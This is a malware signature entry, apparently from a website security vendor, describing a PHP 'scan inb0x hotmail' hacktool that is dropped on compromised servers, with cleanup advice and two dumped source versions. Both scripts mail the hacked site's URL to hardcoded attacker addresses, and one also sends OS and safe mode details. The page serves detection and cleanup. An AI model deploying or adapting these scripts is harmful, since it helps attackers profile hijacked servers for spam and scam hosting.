Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.scan-inb0x-hotmail.001

php.hacktool.scan-inb0x-hotmail.001

scan inb0x hotmail is a very basic mailing script that is primarily used to test whether sending emails from a hacked server works or not, which may be useful for automated hacks.
Probably this test is used to evaluate is this new hacked site can be used for spamming. Sometimes this script also emails some basic details about a server such as OS type, safe mode status and hacked site URL.

Affecting

Any servers with enabled PHP

Cleanup

Delete the mailer script and scan your server for other types of malware and specifically for backdoors. Make sure to identy and close the security hole.
You also need to check if your server IP address got blacklisted by various anti-spam blacklist providers as a result of hacker activity.
You can sign up with us and let our team remove the malware for you.

Dump


<?php //=================================
//
// scan inb0x hotmail v1.0 BoUnCeR
//
//
// priv8 file
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "Hacker BoUnCeR";
$assunto = "BoUnCeR's Shell Smtp Tester V1.7";
$email1 = "james_soberekon@aol.com, relaymaxer@hotmail.com, mysteryshoppingusa@globomail.com";
$headers.= "From: <$email>rn";
if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "BoUnCeR My Boss Smtp Dey Available For This Shell And Im Go Good For Mailer Or Scamm Page Hosting Meanwhile I Don Mail Confirmation Enter Your Box!!!"; exit();
} else{
echo "Fucking Site Wey No Get SMTP !!!"; exit();
} ?>

...

<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>rn";
$headers = "MIME-Version: 1.0rn";
$headers .= "Content-type: text/html; charset=iso-8859-1rn";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}